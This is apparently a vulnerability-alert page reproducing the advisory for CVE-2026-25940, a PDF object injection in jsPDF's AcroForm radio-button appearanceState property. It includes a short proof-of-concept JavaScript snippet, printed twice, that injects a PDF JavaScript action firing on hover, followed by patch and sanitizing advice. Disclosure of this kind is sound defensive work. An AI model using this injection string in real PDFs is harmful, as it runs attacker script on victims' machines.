Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
8.1
jsPDF PDF Injection Allows Arbitrary JavaScript Execution
CVE-2026-25940
GHSA-p5xg-68wr-hm3m
Summary
The jsPDF library has a security flaw that allows hackers to inject malicious JavaScript code into PDF files created with it. This could happen if a user can input data into a PDF form, and that data is not properly checked for safety. To fix this, update to the latest version of jsPDF (at least 4.2.0) or sanitize user input before passing it to the library.
What to do
- Update mrjameshall jspdf to version 4.2.0.
- Update jspdf to version 4.2.0.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| mrjameshall | jspdf | <= 4.2.0 | 4.2.0 |
| parall | jspdf | <= 4.2.0 | – |
| – | jspdf | <= 4.2.0 | 4.2.0 |
Original title
jsPDF has a PDF Injection in AcroForm module allows Arbitrary JavaScript Execution (RadioButton.createOption and "AS" property)
Original description
### Impact
User control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions.
If given the possibility to pass unsanitized input to the following property, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim hovers over the radio option.
* `AcroformChildClass.appearanceState`
Example attack vector:
```js
import { jsPDF } from "jspdf"
const doc = new jsPDF();
const group = new doc.AcroFormRadioButton();
group.x = 10; group.y = 10; group.width = 20; group.height = 10;
doc.addField(group);
const child = group.createOption("opt1");
child.x = 10; child.y = 10; child.width = 20; child.height = 10;
child.appearanceState = "Off /AA << /E << /S /JavaScript /JS (app.alert('XSS')) >> >>";
doc.save("test.pdf");
```
### Patches
The vulnerability has been fixed in [email protected].
### Workarounds
Sanitize user input before passing it to the vulnerable API members.
User control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions.
If given the possibility to pass unsanitized input to the following property, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim hovers over the radio option.
* `AcroformChildClass.appearanceState`
Example attack vector:
```js
import { jsPDF } from "jspdf"
const doc = new jsPDF();
const group = new doc.AcroFormRadioButton();
group.x = 10; group.y = 10; group.width = 20; group.height = 10;
doc.addField(group);
const child = group.createOption("opt1");
child.x = 10; child.y = 10; child.width = 20; child.height = 10;
child.appearanceState = "Off /AA << /E << /S /JavaScript /JS (app.alert('XSS')) >> >>";
doc.save("test.pdf");
```
### Patches
The vulnerability has been fixed in [email protected].
### Workarounds
Sanitize user input before passing it to the vulnerable API members.
nvd CVSS3.1
8.1
Vulnerability type
CWE-116
- https://nvd.nist.gov/vuln/detail/CVE-2026-25940
- https://github.com/advisories/GHSA-p5xg-68wr-hm3m
- https://github.com/parallax/jsPDF/commit/71ad2dbfa6c7c189ab42b855b782620fa8a3837... Patch
- https://github.com/parallax/jsPDF/releases/tag/v4.2.0 Release Notes
- https://github.com/parallax/jsPDF/security/advisories/GHSA-p5xg-68wr-hm3m Vendor Advisory
Published: 19 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026